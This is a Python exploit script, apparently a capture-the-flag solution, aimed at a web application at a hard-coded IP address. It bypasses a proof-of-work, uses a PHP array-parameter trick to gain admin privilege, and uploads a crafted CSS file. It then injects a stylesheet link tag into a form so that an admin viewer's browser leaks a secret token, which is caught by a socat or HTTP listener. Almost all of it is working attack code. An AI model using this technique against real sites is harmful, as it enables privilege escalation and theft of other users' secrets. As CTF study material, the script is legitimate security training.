#!/usr/bin/python -u
#-*- coding: utf-8 -*-

import os
import sys
import time
import requests
import hashlib

r = requests.Session()

def calc_pow(val):
    ''' calc PoW '''
    i = 0
    s = ""
    while True:
        s = str(i)
        if hashlib.sha1(s).hexdigest()[-5:] == val:
            return s
        i += 1

def get_perm():
    ''' basically use php trick to escalate privilege '''
    return r.get("http://52.78.192.229/get_perm.php?cred+plain%5B1]=admin").text

def get_form():
    return r.get("http://52.78.192.229/request.php").text

def submit_form(title, content, pow):
    files = {'license': open('exploit.css','rb')}
    data = {'prod': title, 'purpose': content, 'pow': pow}
    return r.post("http://52.78.192.229/request.php", files=files, data=data).text

def view_form(rid):
    return r.get("http://52.78.192.229/view.php?rid=%s" % (rid,)).text

def send_form(rid):
    t = r.post("http://52.78.192.229/view.php?rid=%s" % (rid,), {'rid': rid}).text
    return t


if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python exploit.py [flag]")
        exit(-1)

    ''' track.php contains session '''
    search_val = "/track.php?id=" + sys.argv[1]

    ''' write_exploit '''
    css_payload = open("payload.css", "rb").read()
    css_payload = css_payload.replace("{{prev}}", search_val)
    exploit = open("exploit.css", "wb")
    exploit.write(css_payload)
    exploit.close()

    ''' trigger bug to get the privilege '''
    get_perm()

    ''' upload exploit first, get the filename of css '''
    resp_form = get_form()
    resp_form_pow = resp_form.split("=== ")[1].split("<")[0]
    proof_hash = calc_pow(resp_form_pow)
    resp_submit = submit_form("OK", "good~", proof_hash)
    resp_submit_url = resp_submit.split("rid=")[1].split('"')[0]
    resp_view = view_form(resp_submit_url)
    css_filename = resp_view.split('license" src="')[1].split('"')[0]

    ''' upload with the stylesheet tag with previously uploaded css file '''
    resp_form = get_form()
    resp_form_pow = resp_form.split("=== ")[1].split("<")[0]
    proof_hash = calc_pow(resp_form_pow)
    resp_submit = submit_form('<link rel=stylesheet href=%s>' % (css_filename,), 'dummy content', proof_hash)
    resp_submit_url = resp_submit.split("rid=")[1].split('"')[0]
    resp_view = view_form(resp_submit_url)
    css_filename = resp_view.split('license" src="')[1].split('"')[0]

    ''' let admin see it '''
    print(view_form(resp_submit_url))
    print(send_form(resp_submit_url))

    '''
    Use socat to listen, or use http server to wait for flag
    $ python exploit.py "t"
    ...
    $ python exploit.py "th1s1sv3rys3cr3tm4g1c0fc55"
    '''